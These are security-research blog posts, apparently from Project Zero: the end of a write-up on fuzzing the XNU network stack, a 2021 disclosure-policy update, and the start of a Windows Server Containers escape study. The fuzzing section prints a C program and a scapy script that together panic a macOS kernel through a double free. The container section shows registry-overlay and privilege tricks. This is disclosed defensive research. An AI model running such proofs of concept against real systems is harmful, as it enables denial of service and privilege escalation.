  }
}
commands {
  set_sock_opt {
    level: IPPROTO_IPV6
    name: IP_FW_ZERO
    val: "\377\377\377\377"
  }
}
commands {
  ip_input {
    tcp6_packet {
      ip6_hdr {
        ip6_hdrctl {
          ip6_un1_flow: 0
          ip6_un1_plen: 0
          ip6_un1_nxt: IPPROTO_ICMPV6
          ip6_un1_hlim: 0
        }
        ip6_src: IN6_ADDR_LOOPBACK
        ip6_dst: IN6_ADDR_ANY
      }
      tcp_hdr {
        th_sport: PORT_2
        th_dport: PORT_1
        th_seq: SEQ_1
        th_ack: SEQ_1
        th_off: 0
        th_win: 0
        th_sum: 0
        th_urp: 0
        is_pure_syn: false
        is_pure_ack: false
      }
      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }
  }
}
data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>
#define __APPLE_USE_RFC_3542
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>

int main() {
    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);
    if (fd < 0) {
        printf("failed\n");
        return 0;
    }
    int res;
    // This is not needed to cause a crash on macOS 10.14.6, but you can
    // try setting this option if you can't reproduce the issue.
    // int space = 1;
    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));
    // printf("res1: %d\n", res);
    int enable = 1;
    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));
    printf("res2: %d\n", res);
    // Keep the socket open without terminating.
    while (1) {
        sleep(5);
    }
    close(fd);
    return 0;
}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)
print(raw(outer).hex())
p = sr1(outer)
if p:
    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.
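
The manual descriptor tracking mentioned above might look something like the following sketch. All names here (`fd_tracker`, `tracker_note_open`, `tracker_note_close`, `tracker_reset`, `fake_close`) are hypothetical, and the fixed table size is an assumption chosen for brevity; the fuzzer's real bookkeeping is not shown in the text.

```c
#include <stdbool.h>
#include <stddef.h>

#define MAX_TRACKED_FDS 64

/* Hypothetical table of descriptors opened by the current test case. */
struct fd_tracker {
  bool open[MAX_TRACKED_FDS];
};

/* Record that a syscall wrapper returned a new descriptor. */
void tracker_note_open(struct fd_tracker *t, int fd) {
  if (fd >= 0 && fd < MAX_TRACKED_FDS) {
    t->open[fd] = true;
  }
}

/* Record that the test case closed a descriptor itself. */
void tracker_note_close(struct fd_tracker *t, int fd) {
  if (fd >= 0 && fd < MAX_TRACKED_FDS) {
    t->open[fd] = false;
  }
}

/*
 * Run after every test case: close whatever is still open so the next
 * test case starts from the same state. Returns how many were closed.
 */
size_t tracker_reset(struct fd_tracker *t, int (*close_fn)(int)) {
  size_t closed = 0;
  for (int fd = 0; fd < MAX_TRACKED_FDS; fd++) {
    if (t->open[fd]) {
      close_fn(fd);
      t->open[fd] = false;
      closed++;
    }
  }
  return closed;
}

/* Stand-in for the fuzzer's close wrapper; remembers the last fd closed. */
int last_closed_fd = -1;
int fake_close(int fd) {
  last_closed_fd = fd;
  return 0;
}
```

This only addresses leaked descriptors; state changed by ioctls in the background, as described above, would need its own teardown.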

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem closer to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly are a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

Policy and Disclosure: 2021 Edition

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

 

We remain committed to adapting our policies and practices to best achieve our mission, demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.
  2. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed. In-the-wild vulnerabilities are not offered a grace period*. Earlier disclosure with mutual agreement.
  3. Technical details are immediately published when a vulnerability is patched in the grace period* (e.g. Patched on Day 100 in grace period, disclosure on Day 100).

2021 Trial ("90+30")

  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.
  2. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix. Vendors can request a 3-day grace period* for in-the-wild bugs. Earlier disclosure with mutual agreement.
  3. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period (e.g. Patched on Day 100 in grace period, disclosure on Day 120).

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix. For vulnerabilities that are being actively exploited and reported under the 7-day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.
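The deadline arithmetic in the 2021 rules above can be sketched as a small C function. This is one illustrative reading of the policy, not an official Project Zero tool: the names `disclosure_day_2021`, `NOT_FIXED`, `fix_day`, and `grace_granted` are hypothetical, and two behaviors are assumptions rather than statements from the policy text (a fix on any day of the grace period is disclosed on the same day as the Day 100 example, and an issue still unfixed when a granted grace period ends is disclosed at the end of that grace period).

```c
#include <stdbool.h>

/* Hypothetical sentinel meaning "no fix has shipped". */
#define NOT_FIXED (-1)

/*
 * Day (counted from the initial report) on which technical details
 * become public under the 2021 "90+30" trial.
 */
int disclosure_day_2021(int fix_day, bool in_the_wild, bool grace_granted)
{
    int deadline = in_the_wild ? 7 : 90;   /* 7-day or 90-day deadline */
    int grace = in_the_wild ? 3 : 14;      /* 3-day or 14-day grace period */
    int final_deadline = grace_granted ? deadline + grace : deadline;

    /* Unpatched at the (possibly extended) deadline: publish then.
     * Assumption: a fix after the final deadline is treated the same way. */
    if (fix_day == NOT_FIXED || fix_day > final_deadline)
        return final_deadline;

    /* Fixed before the deadline: 30 days for patch adoption. */
    if (fix_day <= deadline)
        return fix_day + 30;

    /* Fixed during the grace period: the grace days use up part of the
     * 30-day adoption window (Day 100 fix -> Day 120 disclosure).
     * Assumption: the same end date applies to every grace-period day. */
    return deadline + 30;
}
```

For example, `disclosure_day_2021(100, false, true)` gives 120, matching the "Patched on Day 100 in grace period, disclosure on Day 120" example, and `disclosure_day_2021(45, false, false)` gives 75.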

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice, however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.
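The point about deadlines divisible by 7 is simple modular arithmetic, sketched here in C. The weekday numbering and the function names are conventions chosen for this illustration, not anything defined by the policy.

```c
/* Weekdays numbered 0 = Monday ... 6 = Sunday (a convention chosen here). */
enum { MONDAY = 0, SATURDAY = 5, SUNDAY = 6 };

/* Weekday on which a deadline falls, given the weekday of the report. */
int deadline_weekday(int report_weekday, int days)
{
    return (report_weekday + days) % 7;
}

/* Nonzero if the deadline lands on a Saturday or Sunday. */
int deadline_on_weekend(int report_weekday, int days)
{
    int day = deadline_weekday(report_weekday, days);
    return day == SATURDAY || day == SUNDAY;
}
```

For a report filed on a Monday, a 90-day deadline lands on a Sunday (90 = 12 × 7 + 6), while an 84-day deadline and the following 28-day adoption period both end on a Monday again.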

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits have been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Who Contains the Containers?

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria state that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers, meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks, on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help with a feature which allows symbolic links to be marked as global, letting them reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on GitHub.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to force containers to run under the ContainerUser account instead of ContainerAdministrator. As the reported issue only works when running as an administrator, that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found, it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It would also establish a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there are likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2
USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to a file named dockerfile in that directory. Also place a copy of my PowerShell module in the same directory, under the NtObjectManager directory. Then, in a command prompt in that directory, run the following commands to build and run the container.

C:\container> docker build -t test_image .
Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image
PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION
----------------
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION
-----------------
Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION
---------------------
Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, but among the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system, including administrators. MSRC considers SeImpersonatePrivilege to be administrator equivalent, meaning if you have it you can assume you can get to administrator. It seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

Next I used the NtObject drive provider to list the object manager namespace. For example, checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName
----                                              --------
Ip                                                SymbolicLink
Tcp6                                              SymbolicLink
Http                                              Directory
Ip6                                               SymbolicLink
ahcache                                           SymbolicLink
WMIDataDevice                                     SymbolicLink
LanmanDatagramReceiver                            SymbolicLink
Tcp                                               SymbolicLink
LanmanRedirector                                  SymbolicLink
DxgKrnl                                           SymbolicLink
ConDrv                                            SymbolicLink
Null                                              SymbolicLink
MailslotRedirector                                SymbolicLink
NamedPipe                                         Device
Udp6                                              SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink
KsecDD                                            SymbolicLink
DeviceApi                                         SymbolicLink
MountPointManager                                 Device
...

Interestingly, most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There are likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name
----
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Clients
HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name
----
Classes
Clients
DefaultUserEnvironment
Docker Inc.
Intel
Macromedia
Microsoft
ODBC
OEM
OpenSSH
Partner
Policies
RegisteredApplications
Windows
WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name
----
.DEFAULT
S-1-5-19
S-1-5-20
S-1-5-21-426062036-3400565534-2975477557-1001
S-1-5-21-426062036-3400565534-2975477557-1001_Classes
S-1-5-21-426062036-3400565534-2975477557-1003
S-1-5-18

PS> Get-NtSid

Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, so you’d expect to see a loaded hive for that user SID. However you don’t see one. Instead you see S-1-5-21-426062036-3400565534-2975477557-1001, which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
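The mismatch between the two SOFTWARE listings shown earlier can be made concrete with a small C sketch that diffs them. The key names are copied from that output; the array and function names are hypothetical, and the comparison ignores case because registry key names are case-insensitive (the two listings spell Wow6432Node differently).

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

#define COUNT_OF(a) (sizeof(a) / sizeof((a)[0]))

/* Subkeys of SOFTWARE as listed by the built-in Registry provider. */
const char *const win32_view[] = {
    "Classes", "Clients", "DefaultUserEnvironment", "Microsoft", "ODBC",
    "OpenSSH", "Policies", "RegisteredApplications", "Setup", "Wow6432Node",
};

/* Subkeys of SOFTWARE as listed through the NtObject drive provider. */
const char *const native_view[] = {
    "Classes", "Clients", "DefaultUserEnvironment", "Docker Inc.", "Intel",
    "Macromedia", "Microsoft", "ODBC", "OEM", "OpenSSH", "Partner",
    "Policies", "RegisteredApplications", "Windows", "WOW6432Node",
};

/* Case-insensitive comparison of two key names. */
bool key_name_equal(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
        a++;
        b++;
    }
    return *a == *b;   /* equal only if both strings ended together */
}

/* True if name appears anywhere in list. */
bool list_contains(const char *const *list, size_t n, const char *name)
{
    for (size_t i = 0; i < n; i++) {
        if (key_name_equal(list[i], name))
            return true;
    }
    return false;
}

/* Stores the names present in a but absent from b into out (which must
 * have room for na entries) and returns how many were stored. */
size_t keys_only_in(const char *const *a, size_t na,
                    const char *const *b, size_t nb,
                    const char **out)
{
    size_t found = 0;
    for (size_t i = 0; i < na; i++) {
        if (!list_contains(b, nb, a[i]))
            out[found++] = a[i];
    }
    return found;
}
```

With these inputs, six keys appear only in the native view (Docker Inc., Intel, Macromedia, OEM, Partner and Windows), and Setup appears only in the Win32 view. That is the pattern you would expect if one listing came from the container's hive and the other from the host's.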

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

